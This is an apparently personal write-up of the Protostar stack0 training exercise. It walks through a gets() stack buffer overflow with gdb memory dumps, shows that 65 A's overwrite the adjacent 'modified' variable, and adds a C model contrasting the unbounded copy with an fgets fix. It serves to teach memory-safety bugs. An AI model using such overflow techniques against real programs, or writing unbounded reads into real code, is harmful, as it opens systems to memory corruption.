Encapsulating

Protostar – stack0

Let’s do a Protostar challenge, shall we?

user@protostar:/opt/protostar/bin$ ./stack0 
a
Try again?

Cool, let’s look at the sauce:

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>

int main(int argc, char **argv)
{
  volatile int modified;
  char buffer[64];

  modified = 0;
  gets(buffer);   /* no length argument: reads until newline, however long the line is */

  if(modified != 0) {
    printf("you have changed the 'modified' variable\n");
  } else {
    printf("Try again?\n");
  }
}

Looks like we need to change that modified variable. gets() has no idea how big buffer is, so anything past 64 bytes spills into whatever sits above the buffer on the stack. Let's fire up gdb, break on gets@plt and puts@plt so we can inspect the stack right after the read, and feed it 64 A's:

user@protostar:/opt/protostar/bin$ gdb stack0
GNU gdb (GDB) 7.0.1-debian
Copyright (C) 2009 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "i486-linux-gnu".
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>...
Reading symbols from /opt/protostar/bin/stack0...done.
gdb$ i fu
All defined functions:

File stack0/stack0.c:
int main(int, char **);

Non-debugging symbols:
0x080482bc  _init
0x080482fc  __gmon_start__
0x080482fc  __gmon_start__@plt
0x0804830c  gets
0x0804830c  gets@plt
0x0804831c  __libc_start_main
0x0804831c  __libc_start_main@plt
0x0804832c  puts
0x0804832c  puts@plt
0x08048340  _start
0x08048370  __do_global_dtors_aux
0x080483d0  frame_dummy
0x08048440  __libc_csu_fini
0x08048450  __libc_csu_init
0x080484aa  __i686.get_pc_thunk.bx
0x080484b0  __do_global_ctors_aux
0x080484dc  _fini
gdb$ b *0x0804830c
Breakpoint 1 at 0x804830c
gdb$ b *0x0804832c
Breakpoint 2 at 0x804832c
gdb$ run
--------------------------------------------------------------------------
[regs  EAX: 0xBFFFF73C  EBX: 0xB7FD7FF4  ECX: 0x538C18D2  EDX: 0x00000001  o d I t S
  ESI: 0x00000000  EDI: 0x00000000  EBP: 0xBFFFF788  ESP: 0xBFFFF71C  EIP: 0x08
  CS: 0073  DS: 007B  ES: 007B  FS: 0000  GS: 0033  SS: 007B
--------------------------------------------------------------------------
  EAX: 0x00000000  EBX: 0xB7FD7FF4  ECX: 0xBFFFF73C  EDX: 0xB7FD9334  o d I t s Z a P c 
  ESI: 0x00000000  EDI: 0x00000000  EBP: 0xBFFFF788  ESP: 0xBFFFF71C  EIP: 0x0804832C
  CS: 0073  DS: 007B  ES: 007B  FS: 0000  GS: 0033  SS: 007B
--------------------------------------------------------------------------
0x804832c <puts@plt>:   jmp    DWORD PTR ds:0x8049638
0x8048332 <puts@plt+6>: push   0x18
0x8048337 <puts@plt+11>:        jmp    0x80482ec
0x804833c:      add    BYTE PTR [eax],al
0x804833e:      add    BYTE PTR [eax],al
0x8048340 <_start>:     xor    ebp,ebp
0x8048342 <_start+2>:   pop    esi
0x8048343 <_start+3>:   mov    ecx,esp
--------------------------------------------------------------------------------

Breakpoint 2, 0x0804832c in puts@plt ()
gdb$ x/x64 0xBFFFF730
A syntax error in expression, near `0xBFFFF730'.
gdb$ x/64x 0xBFFFF730
0xbffff730:     0xb7fd7ff4      0xb7ec6165      0xbffff748      0x41414141
0xbffff740:     0x41414141      0x41414141      0x41414141      0x41414141
0xbffff750:     0x41414141      0x41414141      0x41414141      0x41414141
0xbffff760:     0x41414141      0x41414141      0x41414141      0x41414141
0xbffff770:     0x41414141      0x41414141      0x41414141      0x00000000
0xbffff780:     0x08048450      0x00000000      0xbffff808      0xb7eadc76
0xbffff790:     0x00000001      0xbffff834      0xbffff83c      0xb7fe1848
0xbffff7a0:     0xbffff7f0      0xffffffff      0xb7ffeff4      0x0804824b
0xbffff7b0:     0x00000001      0xbffff7f0      0xb7ff0626      0xb7fffab0
0xbffff7c0:     0xb7fe1b28      0xb7fd7ff4      0x00000000      0x00000000
0xbffff7d0:     0xbffff808      0x79db4ec2      0x538c18d2      0x00000000
0xbffff7e0:     0x00000000      0x00000000      0x00000001      0x08048340
0xbffff7f0:     0x00000000      0xb7ff6210      0xb7eadb9b      0xb7ffeff4
0xbffff800:     0x00000001      0x08048340      0x00000000      0x08048361
0xbffff810:     0x080483f4      0x00000001      0xbffff834      0x08048450
0xbffff820:     0x08048440      0xb7ff1040      0xbffff82c      0xb7fff8f8
gdb$

I didn't count out 64 A's by hand; Python did it:

>>> print("A"*64);
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

So in the gdb dump we see sixteen words of 0x41414141 starting at 0xbffff73c (the address gets() was handed, sitting in EAX at breakpoint 1): exactly 64 bytes of buffer. Directly above it, at 0xbffff77c, is a distinct 0x00000000. What's the bet that this is the modified variable? If so, a 65th byte should land on its low byte. Let's try 65 A's in the buffer and see what happens:

user@protostar:/opt/protostar/bin$ gdb stack0
gdb$ b *0x0804830c
Breakpoint 1 at 0x804830c
gdb$ b *0x0804832c
Breakpoint 2 at 0x804832c
gdb$ run
--------------------------------------------------------------------------
[regs  EAX: 0xBFFFF73C  EBX: 0xB7FD7FF4  ECX: 0xAEF44AC0  EDX: 0x00000001  o d I t S
  ESI: 0x00000000  EDI: 0x00000000  EBP: 0xBFFFF788  ESP: 0xBFFFF71C  EIP: 0x08
  CS: 0073  DS: 007B  ES: 007B  FS: 0000  GS: 0033  SS: 007B
--------------------------------------------------------------------------
  EAX: 0x00000041  EBX: 0xB7FD7FF4  ECX: 0xBFFFF73C  EDX: 0xB7FD9334  o d I t s z a P c 
  ESI: 0x00000000  EDI: 0x00000000  EBP: 0xBFFFF788  ESP: 0xBFFFF71C  EIP: 0x0804832C
  CS: 0073  DS: 007B  ES: 007B  FS: 0000  GS: 0033  SS: 007B
--------------------------------------------------------------------------
0x804832c <puts@plt>:   jmp    DWORD PTR ds:0x8049638
0x8048332 <puts@plt+6>: push   0x18
0x8048337 <puts@plt+11>:        jmp    0x80482ec
0x804833c:      add    BYTE PTR [eax],al
0x804833e:      add    BYTE PTR [eax],al
0x8048340 <_start>:     xor    ebp,ebp
0x8048342 <_start+2>:   pop    esi
0x8048343 <_start+3>:   mov    ecx,esp
--------------------------------------------------------------------------------

Breakpoint 2, 0x0804832c in puts@plt ()
gdb$ x/64x 0xBFFFF730
0xbffff730:     0xb7fd7ff4      0xb7ec6165      0xbffff748      0x41414141
0xbffff740:     0x41414141      0x41414141      0x41414141      0x41414141
0xbffff750:     0x41414141      0x41414141      0x41414141      0x41414141
0xbffff760:     0x41414141      0x41414141      0x41414141      0x41414141
0xbffff770:     0x41414141      0x41414141      0x41414141      0x00000041
0xbffff780:     0x08048450      0x00000000      0xbffff808      0xb7eadc76
0xbffff790:     0x00000001      0xbffff834      0xbffff83c      0xb7fe1848
0xbffff7a0:     0xbffff7f0      0xffffffff      0xb7ffeff4      0x0804824b
0xbffff7b0:     0x00000001      0xbffff7f0      0xb7ff0626      0xb7fffab0
0xbffff7c0:     0xb7fe1b28      0xb7fd7ff4      0x00000000      0x00000000
0xbffff7d0:     0xbffff808      0x84a31cd0      0xaef44ac0      0x00000000
0xbffff7e0:     0x00000000      0x00000000      0x00000001      0x08048340
0xbffff7f0:     0x00000000      0xb7ff6210      0xb7eadb9b      0xb7ffeff4
0xbffff800:     0x00000001      0x08048340      0x00000000      0x08048361
0xbffff810:     0x080483f4      0x00000001      0xbffff834      0x08048450
0xbffff820:     0x08048440      0xb7ff1040      0xbffff82c      0xb7fff8f8
gdb$ c
you have changed the 'modified' variable

Program exited with code 051.
--------------------------------------------------------------------------[regs]
  EAX:Error while running hook_stop:
No registers.
gdb$

The 65th byte landed exactly where we guessed: 0xbffff77c now reads 0x00000041, and at the puts@plt breakpoint EAX holds 0x41 with the zero flag clear (lowercase z in the flags line, versus Z in the first run), so the if(modified != 0) branch is taken. One side note on "Program exited with code 051": gdb prints exit codes in octal, so that is 41, the return value of puts() for the 41-byte success message (newline included). main() never returns a value, so whatever puts() left in EAX became the process exit status. The underlying bug is simply that gets() cannot know the size of buffer; fgets(buffer, sizeof buffer, stdin) would have capped the read at 63 bytes plus the terminator and left modified alone.

Next..
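To make the layout concrete, here is an added C example (mine, not code from the original post or from the Protostar binary) that models the frame seen in the dump as a struct: 64 bytes of buffer followed directly by modified. It assumes that adjacency and a little-endian machine (so 65 A's give 0x00000041, as in the dump), and uses a memcpy into the struct so the spill has defined behaviour rather than an actual out-of-bounds stack write. run_bounded is the fgets-style fix placed beside it for comparison.

```c
#include <stdio.h>
#include <string.h>

/*
 * Model of the stack0 frame from the gdb dump: 64 bytes of buffer at
 * 0xbffff73c, then the 4-byte `modified` at 0xbffff77c. A struct gives the
 * same adjacency with defined behaviour (assumption: no padding between
 * a char[64] and an int, which holds on every mainstream ABI).
 */
struct frame {
    char buffer[64];
    int modified;
};

/*
 * gets()-style copy: every input byte is written, the callee has no idea how
 * big `buffer` is, so byte 65 onward lands in `modified`. The cap at
 * sizeof(struct frame) exists only so this demo stays inside the struct.
 */
int run_unbounded(const char *input, size_t len)
{
    struct frame f;
    f.modified = 0;
    if (len > sizeof f)
        len = sizeof f;
    memcpy(&f, input, len);          /* the "gets(buffer)" */
    return f.modified;
}

/*
 * fgets(buffer, sizeof buffer, stdin)-style copy: at most 63 bytes plus a
 * terminating NUL ever touch `buffer`, so `modified` is never written.
 */
int run_bounded(const char *input, size_t len)
{
    struct frame f;
    f.modified = 0;
    size_t n = len < sizeof f.buffer - 1 ? len : sizeof f.buffer - 1;
    memcpy(f.buffer, input, n);
    f.buffer[n] = '\0';
    return f.modified;
}

/* What does `modified` read after feeding n A's (print("A"*n)) to each reader? */
int modified_after_unbounded(size_t n)
{
    char payload[sizeof(struct frame)];  /* constructed input, all 'A' */
    if (n > sizeof payload)
        n = sizeof payload;
    memset(payload, 'A', n);
    return run_unbounded(payload, n);
}

int modified_after_bounded(size_t n)
{
    char payload[sizeof(struct frame)];
    if (n > sizeof payload)
        n = sizeof payload;
    memset(payload, 'A', n);
    return run_bounded(payload, n);
}

int main(void)
{
    size_t lens[] = {64, 65, 68};
    for (size_t i = 0; i < sizeof lens / sizeof lens[0]; i++) {
        printf("%zu A's: gets-style modified=0x%08x, fgets-style modified=0x%08x\n",
               lens[i],
               (unsigned)modified_after_unbounded(lens[i]),
               (unsigned)modified_after_bounded(lens[i]));
    }
    return 0;
}
```

With 64 A's modified stays 0, with 65 it reads 0x41 (little-endian low byte, matching the 0x00000041 in the dump), and with 68 it reads 0x41414141; the bounded reader leaves it at 0 for any input length.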
